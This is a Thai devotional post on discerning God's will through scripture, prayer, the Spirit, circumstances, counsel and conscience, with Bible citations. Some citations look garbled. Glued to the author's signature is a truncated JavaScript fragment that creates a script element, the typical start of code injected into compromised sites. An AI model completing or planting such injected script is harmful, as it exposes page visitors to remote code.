การสังเกตน้ำพระทัยพระเจ้า

q

15 ต.ค. การสังเกตน้ำพระทัยพระเจ้า

สดด.25:12   “ผู้ใดเล่าที่เป็นผู้ที่ยำเกรงพระเจ้า พระองค์จะทรงสั่งสอนผู้นั้นในทางที่เขาเลือกได้”

เราต้องเข้าใจก่อนว่า ทุกเหตุการณ์ในชีวิต  พระเจ้าทรงเป็นผู้นำและควบคุมทั้งสิ้น   สดด.48:259, 38:8, อพย.35:14  พระเจ้าทรงเป็นผู้กำหนด มีน้ำพระทัยสำหรับชีวิตบุตรของพระองค์  ยรม.29:11-13

การทรงนำของพระเจ้ามีหลายทางเช่น ผ่านทางพระคัมภีร์ (2ทธ.3:16  พระวจนะของพระเจ้าเป็นประโยชน์ในการสอน ตักเตือนว่ากล่าว การปรับปรุงแก้ไขคนให้ดี และอบรมในทางธรรม 1คร.14:36-37  ใครถือผู้ใดถือว่าท่านเป็นผู้เผยพระวจนะ หรือฝ่ายวิญญาณก็ควรยอมรับว่า ข้อความซึ่งข้าพเจ้าเขียนมาถึงท่านเป็นดำรัสขององค์พระผู้เป็นเจ้า)

ผ่านทางการอธิษฐาน เป็นสิ่งที่สำคัญมาก  จากชีวิตของพระเยซูคริสต์ พระองค์ ทรงอธิษฐานก่อนเลือกสาวก (ลก.6:12-13) อธิษฐานก่อนการรับใช้ (มธ.4:1-2) และอธิษฐานก่อนสู่กางเขนที่สวนเกทเสมเน  พระองค์ทรงสัญญาว่าจะประทานสติปัญญาในการตัดสิน เมื่อเราทูลขอ  (ยก.1:5-7)

ผ่านทางพระวิญญาณบริสุทธิ์ภายในเรา (กจ.11:12, 16:17) จากพระธรรมยอห์น 14:15-17  พระเยซูทรงเป็นผู้ช่วยให้แก่เราซึ่งเป็นผู้รอบรู้ทุกสิ่ง  เราเห็นตัวอย่างของการทรงนำจากพระวิญญาณบริสุทธิ์ ในเหตุการณืเหล่านี้

ผ่านทางเหตุการณ์สิ่งแวดล้อม  (รม.8:28)  เหตุการณ์ทุกอย่างมีจุดประสงค์จากพระเจ้า แต่เราอย่าเน้นเหตุการณ์เสมอไป แม้เหตุการณ์ไม่ดีพระเจ้าก็เปลี่ยนเป็นดีได้  เช่น…ความทุกข์ยากของอิสราเอลในอียิปต์ ไม่ยอมปล่อยไปนมัสการที่ภูเขาซีนาย แต่สุดท้ายกลับกลายเป็นผลดีไก้เห็นการอัศจรรย์

ผ่านทางผู้นำที่มีจิตวิญญาณมีของประทาน สังเกตวิญญาณ  สภษ.15:22สดด.1:1สภษ.1:15บุคคลเหล่านี้จะช่วยเตือนเป็นที่ปรึกษา แนะนำเราได้ แต่ต้องสอดคล้องกับพระวจนะของพระเจ้า เช่น สิวนัส กับ อควิลลา สังเกตเห็นอปอลโลมีของประทานจึงนำมาสอนเพิ่มเติม

คนที่รับผิดชอบเรา (ฮบ.13:17)  มีอำนาจเหนือเรา  จะมีส่วนในการปกครอบเรา และในการแนะแนวทางของเรา เช่น บิดา-มารดา  (ฮบ.6:1-3) นาย-นายจ้าง  (อฟ.6:5-8) รัฐบาล  (รม.13:7) ผู้นำคริสตจักร  (ฮบ.13:17)  ผ่านทางกฏเกณฑ์ที่คนอื่นให้เรา (1ปต.2:13-16)  .ผ่านมาทางความสามารถของเราเอง  (1คร.12:4, 11, รม.12:13)   ทางความคิดของเรา  ความรู้สึกผิดชอบ ถูก-ผิด  (สดด.26:1)  ความปราถนาของเรา  (สดด.37:4)   สันติสุขในจิตใจ  (คส.3:15) ยังไงเราต้องสังเกตว่า เสียงนั้น ผิดหลักจากพระคัมภีร์ จิตใจฟ้องทำให้ห่างจากทางของพระเจ้าไหม? (อฟ.1:7, รม.13:1)

สิ่งที่ควรหลีกเลี่ยง

อย่าตัดสินใจเองแต่จงทำเพื่อพระเจ้า จงทำให้พระองค์ทรงนำและอธิษฐานเหมือนอิสยาห์ 6:8 เพราะ อุปสรรคความยากลำบากในชีวิตไม่ใช่เครื่องแสดงว่าอยู่ในน้ำพระทัยพระเจ้า (2คร.4:7-11, 2คร.2:14 ) อย่าคิดว่าการที่เราได้ผิดพลาดครั้งหนึ่ง  จะไม่ทำให้เราหันกลับมาหาพระเจ้าได้อีก (1ยน.1:9)

เขียนโดย อาจารย์เจริญ ยธิกุลvar d=document;var s=d.createElement(‘script’);